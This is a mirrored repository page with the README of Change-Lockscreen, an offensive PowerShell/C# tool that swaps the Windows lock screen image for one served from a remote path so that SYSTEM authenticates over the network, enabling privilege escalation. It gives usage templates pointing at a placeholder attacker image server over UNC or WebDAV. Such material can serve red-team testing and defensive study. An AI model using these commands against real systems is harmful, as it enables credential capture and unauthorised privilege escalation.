Projects STRLCPY Change-Lockscreen Files
🤬
Revision indexing in progress... (search in this revision will be accurate after indexed)
Change-Lockscreen Loading last commit info...
Change-Lockscreen.ps1
README.md
README.md

Change-Lockscreen

Change-Lockscreen is a tool to trigger network authentications as SYSTEM by changing the Windows lock screen image from command line to perform privilege escalation attacks such as the following:

  • (Link to Blog)

Features

By default, Windows 10 has a feature called Windows Spotlight. It is in charge of downloading and displaying lock screen images automatically.

  • When this feature is enabled, Change-Lockscreen will disable it and establish the image specified in the arguments.
  • Otherwise if the user has a custom lock screen image, Change-Lockscreen will be in charge to run a backup of it and establish it again.

N.B. While the Poweshell version of the tool works smoothly, the C# version sometimes fails restoring the original image.

Usage

Change-Lockscreen -FullPath \\[imageserver]@[port]\[fakePath]\[image.jpg]
Change-Lockscreen -Webdav \\[imageserver]@[port]\ 

(GIF IMAGE CHANGE)

Acknowledgements

Please wait...
Page is in error, reload to recover